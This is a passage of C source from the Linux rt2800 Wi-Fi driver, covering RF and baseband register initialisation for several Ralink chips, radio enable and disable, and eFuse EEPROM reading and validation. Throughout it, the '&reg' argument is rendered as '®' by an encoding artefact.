rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 0);
rt2x00_set_field32(®, LDO_CFG0_BGSEL, 1);
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
rt2800_rx_filter_calibration(rt2x00dev);
rt2800_led_open_drain_enable(rt2x00dev);
rt2800_normal_mode_setup_3xxx(rt2x00dev);
}
static void rt3593_post_bbp_init(struct rt2x00_dev *rt2x00dev)
{
u8 bbp;
bool txbf_enabled = false; /* FIXME */
rt2800_bbp_read(rt2x00dev, 105, &bbp);
if (rt2x00dev->default_ant.rx_chain_num == 1)
rt2x00_set_field8(&bbp, BBP105_MLD, 0);
else
rt2x00_set_field8(&bbp, BBP105_MLD, 1);
rt2800_bbp_write(rt2x00dev, 105, bbp);
rt2800_bbp4_mac_if_ctrl(rt2x00dev);
rt2800_bbp_write(rt2x00dev, 92, 0x02);
rt2800_bbp_write(rt2x00dev, 82, 0x82);
rt2800_bbp_write(rt2x00dev, 106, 0x05);
rt2800_bbp_write(rt2x00dev, 104, 0x92);
rt2800_bbp_write(rt2x00dev, 88, 0x90);
rt2800_bbp_write(rt2x00dev, 148, 0xc8);
rt2800_bbp_write(rt2x00dev, 47, 0x48);
rt2800_bbp_write(rt2x00dev, 120, 0x50);
if (txbf_enabled)
rt2800_bbp_write(rt2x00dev, 163, 0xbd);
else
rt2800_bbp_write(rt2x00dev, 163, 0x9d);
/* SNR mapping */
rt2800_bbp_write(rt2x00dev, 142, 6);
rt2800_bbp_write(rt2x00dev, 143, 160);
rt2800_bbp_write(rt2x00dev, 142, 7);
rt2800_bbp_write(rt2x00dev, 143, 161);
rt2800_bbp_write(rt2x00dev, 142, 8);
rt2800_bbp_write(rt2x00dev, 143, 162);
/* ADC/DAC control */
rt2800_bbp_write(rt2x00dev, 31, 0x08);
/* RX AGC energy lower bound in log2 */
rt2800_bbp_write(rt2x00dev, 68, 0x0b);
/* FIXME: BBP 105 owerwrite? */
rt2800_bbp_write(rt2x00dev, 105, 0x04);
}
static void rt2800_init_rfcsr_3593(struct rt2x00_dev *rt2x00dev)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u32 reg;
u8 rfcsr;
/* Disable GPIO #4 and #7 function for LAN PE control */
rt2800_register_read(rt2x00dev, GPIO_SWITCH, ®);
rt2x00_set_field32(®, GPIO_SWITCH_4, 0);
rt2x00_set_field32(®, GPIO_SWITCH_7, 0);
rt2800_register_write(rt2x00dev, GPIO_SWITCH, reg);
/* Initialize default register values */
rt2800_rfcsr_write(rt2x00dev, 1, 0x03);
rt2800_rfcsr_write(rt2x00dev, 3, 0x80);
rt2800_rfcsr_write(rt2x00dev, 5, 0x00);
rt2800_rfcsr_write(rt2x00dev, 6, 0x40);
rt2800_rfcsr_write(rt2x00dev, 8, 0xf1);
rt2800_rfcsr_write(rt2x00dev, 9, 0x02);
rt2800_rfcsr_write(rt2x00dev, 10, 0xd3);
rt2800_rfcsr_write(rt2x00dev, 11, 0x40);
rt2800_rfcsr_write(rt2x00dev, 12, 0x4e);
rt2800_rfcsr_write(rt2x00dev, 13, 0x12);
rt2800_rfcsr_write(rt2x00dev, 18, 0x40);
rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x78);
rt2800_rfcsr_write(rt2x00dev, 33, 0x3b);
rt2800_rfcsr_write(rt2x00dev, 34, 0x3c);
rt2800_rfcsr_write(rt2x00dev, 35, 0xe0);
rt2800_rfcsr_write(rt2x00dev, 38, 0x86);
rt2800_rfcsr_write(rt2x00dev, 39, 0x23);
rt2800_rfcsr_write(rt2x00dev, 44, 0xd3);
rt2800_rfcsr_write(rt2x00dev, 45, 0xbb);
rt2800_rfcsr_write(rt2x00dev, 46, 0x60);
rt2800_rfcsr_write(rt2x00dev, 49, 0x8e);
rt2800_rfcsr_write(rt2x00dev, 50, 0x86);
rt2800_rfcsr_write(rt2x00dev, 51, 0x75);
rt2800_rfcsr_write(rt2x00dev, 52, 0x45);
rt2800_rfcsr_write(rt2x00dev, 53, 0x18);
rt2800_rfcsr_write(rt2x00dev, 54, 0x18);
rt2800_rfcsr_write(rt2x00dev, 55, 0x18);
rt2800_rfcsr_write(rt2x00dev, 56, 0xdb);
rt2800_rfcsr_write(rt2x00dev, 57, 0x6e);
/* Initiate calibration */
/* TODO: use rt2800_rf_init_calibration ? */
rt2800_rfcsr_read(rt2x00dev, 2, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR2_RESCAL_EN, 1);
rt2800_rfcsr_write(rt2x00dev, 2, rfcsr);
rt2800_adjust_freq_offset(rt2x00dev);
rt2800_rfcsr_read(rt2x00dev, 18, &rfcsr);
rt2x00_set_field8(&rfcsr, RFCSR18_XO_TUNE_BYPASS, 1);
rt2800_rfcsr_write(rt2x00dev, 18, rfcsr);
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 3);
rt2x00_set_field32(®, LDO_CFG0_BGSEL, 1);
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
usleep_range(1000, 1500);
rt2800_register_read(rt2x00dev, LDO_CFG0, ®);
rt2x00_set_field32(®, LDO_CFG0_LDO_CORE_VLEVEL, 0);
rt2800_register_write(rt2x00dev, LDO_CFG0, reg);
/* Set initial values for RX filter calibration */
drv_data->calibration_bw20 = 0x1f;
drv_data->calibration_bw40 = 0x2f;
/* Save BBP 25 & 26 values for later use in channel switching */
rt2800_bbp_read(rt2x00dev, 25, &drv_data->bbp25);
rt2800_bbp_read(rt2x00dev, 26, &drv_data->bbp26);
rt2800_led_open_drain_enable(rt2x00dev);
rt2800_normal_mode_setup_3593(rt2x00dev);
rt3593_post_bbp_init(rt2x00dev);
/* TODO: enable stream mode support */
}
static void rt2800_init_rfcsr_5390(struct rt2x00_dev *rt2x00dev)
{
rt2800_rf_init_calibration(rt2x00dev, 2);
rt2800_rfcsr_write(rt2x00dev, 1, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 2, 0x80);
rt2800_rfcsr_write(rt2x00dev, 3, 0x88);
rt2800_rfcsr_write(rt2x00dev, 5, 0x10);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
rt2800_rfcsr_write(rt2x00dev, 6, 0xe0);
else
rt2800_rfcsr_write(rt2x00dev, 6, 0xa0);
rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
rt2800_rfcsr_write(rt2x00dev, 10, 0x53);
rt2800_rfcsr_write(rt2x00dev, 11, 0x4a);
rt2800_rfcsr_write(rt2x00dev, 12, 0x46);
rt2800_rfcsr_write(rt2x00dev, 13, 0x9f);
rt2800_rfcsr_write(rt2x00dev, 14, 0x00);
rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
rt2800_rfcsr_write(rt2x00dev, 16, 0x00);
rt2800_rfcsr_write(rt2x00dev, 18, 0x03);
rt2800_rfcsr_write(rt2x00dev, 19, 0x00);
rt2800_rfcsr_write(rt2x00dev, 20, 0x00);
rt2800_rfcsr_write(rt2x00dev, 21, 0x00);
rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
rt2800_rfcsr_write(rt2x00dev, 23, 0x00);
rt2800_rfcsr_write(rt2x00dev, 24, 0x00);
if (rt2x00_is_usb(rt2x00dev) &&
rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
else
rt2800_rfcsr_write(rt2x00dev, 25, 0xc0);
rt2800_rfcsr_write(rt2x00dev, 26, 0x00);
rt2800_rfcsr_write(rt2x00dev, 27, 0x09);
rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x80);
rt2800_rfcsr_write(rt2x00dev, 33, 0x00);
rt2800_rfcsr_write(rt2x00dev, 34, 0x07);
rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
rt2800_rfcsr_write(rt2x00dev, 37, 0x08);
rt2800_rfcsr_write(rt2x00dev, 38, 0x85);
rt2800_rfcsr_write(rt2x00dev, 39, 0x1b);
rt2800_rfcsr_write(rt2x00dev, 40, 0x0b);
rt2800_rfcsr_write(rt2x00dev, 41, 0xbb);
rt2800_rfcsr_write(rt2x00dev, 42, 0xd2);
rt2800_rfcsr_write(rt2x00dev, 43, 0x9a);
rt2800_rfcsr_write(rt2x00dev, 44, 0x0e);
rt2800_rfcsr_write(rt2x00dev, 45, 0xa2);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
rt2800_rfcsr_write(rt2x00dev, 46, 0x73);
else
rt2800_rfcsr_write(rt2x00dev, 46, 0x7b);
rt2800_rfcsr_write(rt2x00dev, 47, 0x00);
rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
rt2800_rfcsr_write(rt2x00dev, 49, 0x94);
rt2800_rfcsr_write(rt2x00dev, 52, 0x38);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
rt2800_rfcsr_write(rt2x00dev, 53, 0x00);
else
rt2800_rfcsr_write(rt2x00dev, 53, 0x84);
rt2800_rfcsr_write(rt2x00dev, 54, 0x78);
rt2800_rfcsr_write(rt2x00dev, 55, 0x44);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F))
rt2800_rfcsr_write(rt2x00dev, 56, 0x42);
else
rt2800_rfcsr_write(rt2x00dev, 56, 0x22);
rt2800_rfcsr_write(rt2x00dev, 57, 0x80);
rt2800_rfcsr_write(rt2x00dev, 58, 0x7f);
rt2800_rfcsr_write(rt2x00dev, 59, 0x8f);
rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390F)) {
if (rt2x00_is_usb(rt2x00dev))
rt2800_rfcsr_write(rt2x00dev, 61, 0xd1);
else
rt2800_rfcsr_write(rt2x00dev, 61, 0xd5);
} else {
if (rt2x00_is_usb(rt2x00dev))
rt2800_rfcsr_write(rt2x00dev, 61, 0xdd);
else
rt2800_rfcsr_write(rt2x00dev, 61, 0xb5);
}
rt2800_rfcsr_write(rt2x00dev, 62, 0x00);
rt2800_rfcsr_write(rt2x00dev, 63, 0x00);
rt2800_normal_mode_setup_5xxx(rt2x00dev);
rt2800_led_open_drain_enable(rt2x00dev);
}
static void rt2800_init_rfcsr_5392(struct rt2x00_dev *rt2x00dev)
{
rt2800_rf_init_calibration(rt2x00dev, 2);
rt2800_rfcsr_write(rt2x00dev, 1, 0x17);
rt2800_rfcsr_write(rt2x00dev, 3, 0x88);
rt2800_rfcsr_write(rt2x00dev, 5, 0x10);
rt2800_rfcsr_write(rt2x00dev, 6, 0xe0);
rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
rt2800_rfcsr_write(rt2x00dev, 10, 0x53);
rt2800_rfcsr_write(rt2x00dev, 11, 0x4a);
rt2800_rfcsr_write(rt2x00dev, 12, 0x46);
rt2800_rfcsr_write(rt2x00dev, 13, 0x9f);
rt2800_rfcsr_write(rt2x00dev, 14, 0x00);
rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
rt2800_rfcsr_write(rt2x00dev, 16, 0x00);
rt2800_rfcsr_write(rt2x00dev, 18, 0x03);
rt2800_rfcsr_write(rt2x00dev, 19, 0x4d);
rt2800_rfcsr_write(rt2x00dev, 20, 0x00);
rt2800_rfcsr_write(rt2x00dev, 21, 0x8d);
rt2800_rfcsr_write(rt2x00dev, 22, 0x20);
rt2800_rfcsr_write(rt2x00dev, 23, 0x0b);
rt2800_rfcsr_write(rt2x00dev, 24, 0x44);
rt2800_rfcsr_write(rt2x00dev, 25, 0x80);
rt2800_rfcsr_write(rt2x00dev, 26, 0x82);
rt2800_rfcsr_write(rt2x00dev, 27, 0x09);
rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
rt2800_rfcsr_write(rt2x00dev, 30, 0x10);
rt2800_rfcsr_write(rt2x00dev, 31, 0x80);
rt2800_rfcsr_write(rt2x00dev, 32, 0x20);
rt2800_rfcsr_write(rt2x00dev, 33, 0xC0);
rt2800_rfcsr_write(rt2x00dev, 34, 0x07);
rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
rt2800_rfcsr_write(rt2x00dev, 36, 0x00);
rt2800_rfcsr_write(rt2x00dev, 37, 0x08);
rt2800_rfcsr_write(rt2x00dev, 38, 0x89);
rt2800_rfcsr_write(rt2x00dev, 39, 0x1b);
rt2800_rfcsr_write(rt2x00dev, 40, 0x0f);
rt2800_rfcsr_write(rt2x00dev, 41, 0xbb);
rt2800_rfcsr_write(rt2x00dev, 42, 0xd5);
rt2800_rfcsr_write(rt2x00dev, 43, 0x9b);
rt2800_rfcsr_write(rt2x00dev, 44, 0x0e);
rt2800_rfcsr_write(rt2x00dev, 45, 0xa2);
rt2800_rfcsr_write(rt2x00dev, 46, 0x73);
rt2800_rfcsr_write(rt2x00dev, 47, 0x0c);
rt2800_rfcsr_write(rt2x00dev, 48, 0x10);
rt2800_rfcsr_write(rt2x00dev, 49, 0x94);
rt2800_rfcsr_write(rt2x00dev, 50, 0x94);
rt2800_rfcsr_write(rt2x00dev, 51, 0x3a);
rt2800_rfcsr_write(rt2x00dev, 52, 0x48);
rt2800_rfcsr_write(rt2x00dev, 53, 0x44);
rt2800_rfcsr_write(rt2x00dev, 54, 0x38);
rt2800_rfcsr_write(rt2x00dev, 55, 0x43);
rt2800_rfcsr_write(rt2x00dev, 56, 0xa1);
rt2800_rfcsr_write(rt2x00dev, 57, 0x00);
rt2800_rfcsr_write(rt2x00dev, 58, 0x39);
rt2800_rfcsr_write(rt2x00dev, 59, 0x07);
rt2800_rfcsr_write(rt2x00dev, 60, 0x45);
rt2800_rfcsr_write(rt2x00dev, 61, 0x91);
rt2800_rfcsr_write(rt2x00dev, 62, 0x39);
rt2800_rfcsr_write(rt2x00dev, 63, 0x07);
rt2800_normal_mode_setup_5xxx(rt2x00dev);
rt2800_led_open_drain_enable(rt2x00dev);
}
static void rt2800_init_rfcsr_5592(struct rt2x00_dev *rt2x00dev)
{
rt2800_rf_init_calibration(rt2x00dev, 30);
rt2800_rfcsr_write(rt2x00dev, 1, 0x3F);
rt2800_rfcsr_write(rt2x00dev, 3, 0x08);
rt2800_rfcsr_write(rt2x00dev, 5, 0x10);
rt2800_rfcsr_write(rt2x00dev, 6, 0xE4);
rt2800_rfcsr_write(rt2x00dev, 7, 0x00);
rt2800_rfcsr_write(rt2x00dev, 14, 0x00);
rt2800_rfcsr_write(rt2x00dev, 15, 0x00);
rt2800_rfcsr_write(rt2x00dev, 16, 0x00);
rt2800_rfcsr_write(rt2x00dev, 18, 0x03);
rt2800_rfcsr_write(rt2x00dev, 19, 0x4D);
rt2800_rfcsr_write(rt2x00dev, 20, 0x10);
rt2800_rfcsr_write(rt2x00dev, 21, 0x8D);
rt2800_rfcsr_write(rt2x00dev, 26, 0x82);
rt2800_rfcsr_write(rt2x00dev, 28, 0x00);
rt2800_rfcsr_write(rt2x00dev, 29, 0x10);
rt2800_rfcsr_write(rt2x00dev, 33, 0xC0);
rt2800_rfcsr_write(rt2x00dev, 34, 0x07);
rt2800_rfcsr_write(rt2x00dev, 35, 0x12);
rt2800_rfcsr_write(rt2x00dev, 47, 0x0C);
rt2800_rfcsr_write(rt2x00dev, 53, 0x22);
rt2800_rfcsr_write(rt2x00dev, 63, 0x07);
rt2800_rfcsr_write(rt2x00dev, 2, 0x80);
msleep(1);
rt2800_adjust_freq_offset(rt2x00dev);
/* Enable DC filter */
if (rt2x00_rt_rev_gte(rt2x00dev, RT5592, REV_RT5592C))
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
rt2800_normal_mode_setup_5xxx(rt2x00dev);
if (rt2x00_rt_rev_lt(rt2x00dev, RT5592, REV_RT5592C))
rt2800_rfcsr_write(rt2x00dev, 27, 0x03);
rt2800_led_open_drain_enable(rt2x00dev);
}
static void rt2800_init_rfcsr(struct rt2x00_dev *rt2x00dev)
{
if (rt2800_is_305x_soc(rt2x00dev)) {
rt2800_init_rfcsr_305x_soc(rt2x00dev);
return;
}
switch (rt2x00dev->chip.rt) {
case RT3070:
case RT3071:
case RT3090:
rt2800_init_rfcsr_30xx(rt2x00dev);
break;
case RT3290:
rt2800_init_rfcsr_3290(rt2x00dev);
break;
case RT3352:
rt2800_init_rfcsr_3352(rt2x00dev);
break;
case RT3390:
rt2800_init_rfcsr_3390(rt2x00dev);
break;
case RT3572:
rt2800_init_rfcsr_3572(rt2x00dev);
break;
case RT3593:
rt2800_init_rfcsr_3593(rt2x00dev);
break;
case RT5390:
rt2800_init_rfcsr_5390(rt2x00dev);
break;
case RT5392:
rt2800_init_rfcsr_5392(rt2x00dev);
break;
case RT5592:
rt2800_init_rfcsr_5592(rt2x00dev);
break;
}
}
int rt2800_enable_radio(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u16 word;
/*
* Initialize MAC registers.
*/
if (unlikely(rt2800_wait_wpdma_ready(rt2x00dev) ||
rt2800_init_registers(rt2x00dev)))
return -EIO;
/*
* Wait BBP/RF to wake up.
*/
if (unlikely(rt2800_wait_bbp_rf_ready(rt2x00dev)))
return -EIO;
/*
* Send signal during boot time to initialize firmware.
*/
rt2800_register_write(rt2x00dev, H2M_BBP_AGENT, 0);
rt2800_register_write(rt2x00dev, H2M_MAILBOX_CSR, 0);
if (rt2x00_is_usb(rt2x00dev))
rt2800_register_write(rt2x00dev, H2M_INT_SRC, 0);
rt2800_mcu_request(rt2x00dev, MCU_BOOT_SIGNAL, 0, 0, 0);
msleep(1);
/*
* Make sure BBP is up and running.
*/
if (unlikely(rt2800_wait_bbp_ready(rt2x00dev)))
return -EIO;
/*
* Initialize BBP/RF registers.
*/
rt2800_init_bbp(rt2x00dev);
rt2800_init_rfcsr(rt2x00dev);
if (rt2x00_is_usb(rt2x00dev) &&
(rt2x00_rt(rt2x00dev, RT3070) ||
rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3572))) {
udelay(200);
rt2800_mcu_request(rt2x00dev, MCU_CURRENT, 0, 0, 0);
udelay(10);
}
/*
* Enable RX.
*/
rt2800_register_read(rt2x00dev, MAC_SYS_CTRL, ®);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_TX, 1);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_RX, 0);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, reg);
udelay(50);
rt2800_register_read(rt2x00dev, WPDMA_GLO_CFG, ®);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_TX_DMA, 1);
rt2x00_set_field32(®, WPDMA_GLO_CFG_ENABLE_RX_DMA, 1);
rt2x00_set_field32(®, WPDMA_GLO_CFG_WP_DMA_BURST_SIZE, 2);
rt2x00_set_field32(®, WPDMA_GLO_CFG_TX_WRITEBACK_DONE, 1);
rt2800_register_write(rt2x00dev, WPDMA_GLO_CFG, reg);
rt2800_register_read(rt2x00dev, MAC_SYS_CTRL, ®);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_TX, 1);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_RX, 1);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, reg);
/*
* Initialize LED control
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_LED_AG_CONF, &word);
rt2800_mcu_request(rt2x00dev, MCU_LED_AG_CONF, 0xff,
word & 0xff, (word >> 8) & 0xff);
rt2800_eeprom_read(rt2x00dev, EEPROM_LED_ACT_CONF, &word);
rt2800_mcu_request(rt2x00dev, MCU_LED_ACT_CONF, 0xff,
word & 0xff, (word >> 8) & 0xff);
rt2800_eeprom_read(rt2x00dev, EEPROM_LED_POLARITY, &word);
rt2800_mcu_request(rt2x00dev, MCU_LED_LED_POLARITY, 0xff,
word & 0xff, (word >> 8) & 0xff);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_enable_radio);
void rt2800_disable_radio(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
rt2800_disable_wpdma(rt2x00dev);
/* Wait for DMA, ignore error */
rt2800_wait_wpdma_ready(rt2x00dev);
rt2800_register_read(rt2x00dev, MAC_SYS_CTRL, ®);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_TX, 0);
rt2x00_set_field32(®, MAC_SYS_CTRL_ENABLE_RX, 0);
rt2800_register_write(rt2x00dev, MAC_SYS_CTRL, reg);
}
EXPORT_SYMBOL_GPL(rt2800_disable_radio);
int rt2800_efuse_detect(struct rt2x00_dev *rt2x00dev)
{
u32 reg;
u16 efuse_ctrl_reg;
if (rt2x00_rt(rt2x00dev, RT3290))
efuse_ctrl_reg = EFUSE_CTRL_3290;
else
efuse_ctrl_reg = EFUSE_CTRL;
rt2800_register_read(rt2x00dev, efuse_ctrl_reg, ®);
return rt2x00_get_field32(reg, EFUSE_CTRL_PRESENT);
}
EXPORT_SYMBOL_GPL(rt2800_efuse_detect);
static void rt2800_efuse_read(struct rt2x00_dev *rt2x00dev, unsigned int i)
{
u32 reg;
u16 efuse_ctrl_reg;
u16 efuse_data0_reg;
u16 efuse_data1_reg;
u16 efuse_data2_reg;
u16 efuse_data3_reg;
if (rt2x00_rt(rt2x00dev, RT3290)) {
efuse_ctrl_reg = EFUSE_CTRL_3290;
efuse_data0_reg = EFUSE_DATA0_3290;
efuse_data1_reg = EFUSE_DATA1_3290;
efuse_data2_reg = EFUSE_DATA2_3290;
efuse_data3_reg = EFUSE_DATA3_3290;
} else {
efuse_ctrl_reg = EFUSE_CTRL;
efuse_data0_reg = EFUSE_DATA0;
efuse_data1_reg = EFUSE_DATA1;
efuse_data2_reg = EFUSE_DATA2;
efuse_data3_reg = EFUSE_DATA3;
}
mutex_lock(&rt2x00dev->csr_mutex);
rt2800_register_read_lock(rt2x00dev, efuse_ctrl_reg, ®);
rt2x00_set_field32(®, EFUSE_CTRL_ADDRESS_IN, i);
rt2x00_set_field32(®, EFUSE_CTRL_MODE, 0);
rt2x00_set_field32(®, EFUSE_CTRL_KICK, 1);
rt2800_register_write_lock(rt2x00dev, efuse_ctrl_reg, reg);
/* Wait until the EEPROM has been loaded */
rt2800_regbusy_read(rt2x00dev, efuse_ctrl_reg, EFUSE_CTRL_KICK, ®);
/* Apparently the data is read from end to start */
rt2800_register_read_lock(rt2x00dev, efuse_data3_reg, ®);
/* The returned value is in CPU order, but eeprom is le */
*(u32 *)&rt2x00dev->eeprom[i] = cpu_to_le32(reg);
rt2800_register_read_lock(rt2x00dev, efuse_data2_reg, ®);
*(u32 *)&rt2x00dev->eeprom[i + 2] = cpu_to_le32(reg);
rt2800_register_read_lock(rt2x00dev, efuse_data1_reg, ®);
*(u32 *)&rt2x00dev->eeprom[i + 4] = cpu_to_le32(reg);
rt2800_register_read_lock(rt2x00dev, efuse_data0_reg, ®);
*(u32 *)&rt2x00dev->eeprom[i + 6] = cpu_to_le32(reg);
mutex_unlock(&rt2x00dev->csr_mutex);
}
int rt2800_read_eeprom_efuse(struct rt2x00_dev *rt2x00dev)
{
unsigned int i;
for (i = 0; i < EEPROM_SIZE / sizeof(u16); i += 8)
rt2800_efuse_read(rt2x00dev, i);
return 0;
}
EXPORT_SYMBOL_GPL(rt2800_read_eeprom_efuse);
static u8 rt2800_get_txmixer_gain_24g(struct rt2x00_dev *rt2x00dev)
{
u16 word;
if (rt2x00_rt(rt2x00dev, RT3593))
return 0;
rt2800_eeprom_read(rt2x00dev, EEPROM_TXMIXER_GAIN_BG, &word);
if ((word & 0x00ff) != 0x00ff)
return rt2x00_get_field16(word, EEPROM_TXMIXER_GAIN_BG_VAL);
return 0;
}
static u8 rt2800_get_txmixer_gain_5g(struct rt2x00_dev *rt2x00dev)
{
u16 word;
if (rt2x00_rt(rt2x00dev, RT3593))
return 0;
rt2800_eeprom_read(rt2x00dev, EEPROM_TXMIXER_GAIN_A, &word);
if ((word & 0x00ff) != 0x00ff)
return rt2x00_get_field16(word, EEPROM_TXMIXER_GAIN_A_VAL);
return 0;
}
static int rt2800_validate_eeprom(struct rt2x00_dev *rt2x00dev)
{
struct rt2800_drv_data *drv_data = rt2x00dev->drv_data;
u16 word;
u8 *mac;
u8 default_lna_gain;
int retval;
/*
* Read the EEPROM.
*/
retval = rt2800_read_eeprom(rt2x00dev);
if (retval)
return retval;
/*
* Start validation of the data that has been read.
*/
mac = rt2800_eeprom_addr(rt2x00dev, EEPROM_MAC_ADDR_0);
if (!is_valid_ether_addr(mac)) {
eth_random_addr(mac);
rt2x00_eeprom_dbg(rt2x00dev, "MAC: %pM\n", mac);
}
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &word);
if (word == 0xffff) {
rt2x00_set_field16(&word, EEPROM_NIC_CONF0_RXPATH, 2);
rt2x00_set_field16(&word, EEPROM_NIC_CONF0_TXPATH, 1);
rt2x00_set_field16(&word, EEPROM_NIC_CONF0_RF_TYPE, RF2820);
rt2800_eeprom_write(rt2x00dev, EEPROM_NIC_CONF0, word);
rt2x00_eeprom_dbg(rt2x00dev, "Antenna: 0x%04x\n", word);
} else if (rt2x00_rt(rt2x00dev, RT2860) ||
rt2x00_rt(rt2x00dev, RT2872)) {
/*
* There is a max of 2 RX streams for RT28x0 series
*/
if (rt2x00_get_field16(word, EEPROM_NIC_CONF0_RXPATH) > 2)
rt2x00_set_field16(&word, EEPROM_NIC_CONF0_RXPATH, 2);
rt2800_eeprom_write(rt2x00dev, EEPROM_NIC_CONF0, word);
}
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &word);
if (word == 0xffff) {
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_HW_RADIO, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_EXTERNAL_TX_ALC, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_EXTERNAL_LNA_2G, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_EXTERNAL_LNA_5G, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_CARDBUS_ACCEL, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_SB_2G, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_SB_5G, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_WPS_PBC, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_2G, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BW40M_5G, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BROADBAND_EXT_LNA, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_ANT_DIVERSITY, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_INTERNAL_TX_ALC, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_BT_COEXIST, 0);
rt2x00_set_field16(&word, EEPROM_NIC_CONF1_DAC_TEST, 0);
rt2800_eeprom_write(rt2x00dev, EEPROM_NIC_CONF1, word);
rt2x00_eeprom_dbg(rt2x00dev, "NIC: 0x%04x\n", word);
}
rt2800_eeprom_read(rt2x00dev, EEPROM_FREQ, &word);
if ((word & 0x00ff) == 0x00ff) {
rt2x00_set_field16(&word, EEPROM_FREQ_OFFSET, 0);
rt2800_eeprom_write(rt2x00dev, EEPROM_FREQ, word);
rt2x00_eeprom_dbg(rt2x00dev, "Freq: 0x%04x\n", word);
}
if ((word & 0xff00) == 0xff00) {
rt2x00_set_field16(&word, EEPROM_FREQ_LED_MODE,
LED_MODE_TXRX_ACTIVITY);
rt2x00_set_field16(&word, EEPROM_FREQ_LED_POLARITY, 0);
rt2800_eeprom_write(rt2x00dev, EEPROM_FREQ, word);
rt2800_eeprom_write(rt2x00dev, EEPROM_LED_AG_CONF, 0x5555);
rt2800_eeprom_write(rt2x00dev, EEPROM_LED_ACT_CONF, 0x2221);
rt2800_eeprom_write(rt2x00dev, EEPROM_LED_POLARITY, 0xa9f8);
rt2x00_eeprom_dbg(rt2x00dev, "Led Mode: 0x%04x\n", word);
}
/*
* During the LNA validation we are going to use
* lna0 as correct value. Note that EEPROM_LNA
* is never validated.
*/
rt2800_eeprom_read(rt2x00dev, EEPROM_LNA, &word);
default_lna_gain = rt2x00_get_field16(word, EEPROM_LNA_A0);
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG, &word);
if (abs(rt2x00_get_field16(word, EEPROM_RSSI_BG_OFFSET0)) > 10)
rt2x00_set_field16(&word, EEPROM_RSSI_BG_OFFSET0, 0);
if (abs(rt2x00_get_field16(word, EEPROM_RSSI_BG_OFFSET1)) > 10)
rt2x00_set_field16(&word, EEPROM_RSSI_BG_OFFSET1, 0);
rt2800_eeprom_write(rt2x00dev, EEPROM_RSSI_BG, word);
drv_data->txmixer_gain_24g = rt2800_get_txmixer_gain_24g(rt2x00dev);
rt2800_eeprom_read(rt2x00dev, EEPROM_RSSI_BG2, &word);
if (abs(rt2x00_get_field16(word, EEPROM_RSSI_BG2_OFFSET2)) > 10)
rt2x00_set_field16(&word, EEPROM_RSSI_BG2_OFFSET2, 0);
if (!rt2x00_rt(rt2x00dev, RT3593)) {
if (rt2x00_get_field16(word, EEPROM_RSSI_BG2_LNA_A1) == 0x00 ||
